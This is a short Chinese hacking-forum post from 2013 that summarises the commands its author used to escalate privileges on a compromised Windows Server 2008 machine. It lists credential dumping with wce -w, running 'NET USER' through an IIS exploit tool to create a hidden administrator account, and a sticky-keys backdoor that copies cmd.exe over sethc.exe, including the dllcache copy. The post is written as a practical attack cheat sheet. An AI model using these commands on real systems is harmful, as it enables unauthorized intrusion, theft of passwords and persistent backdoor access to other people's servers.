找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3659|回复: 0
打印 上一主题 下一主题

提权windows 2008的几个常用命令

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-13 19:19:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上次提权一 windows 2008的主机,现将用到的几个命令总结如下。
1.使用wce抓取密码  直接抓密码命令wce -w

2.webshell提权要看是什么权限,如果是system权限则可以直接添加用户。否则只能通过漏洞提权了。

3.iis7.exe 工具使用命令

IIS "NET USER TEMP TEMP /ADD "

IIS "NET LOCALGROUP ADMINISTRATORS TEMP /ADD"

4.set命令
可检查系统设置情况

5.systeminfo
查看系统详细信息 这个比set和whoami都要好使

6. whoami是操作系统中用于查看当前用户权限(英语:User (computing))的命令
调用该命令时系统会输出当前用户的有效用户名

7.另外还用到了粘滞键替换的几条命令:

copy c:\windows\system32\sethc.exe c:\windows\system32\sethcbk.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe


   以上是本人的一点小总结。高手勿喷。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表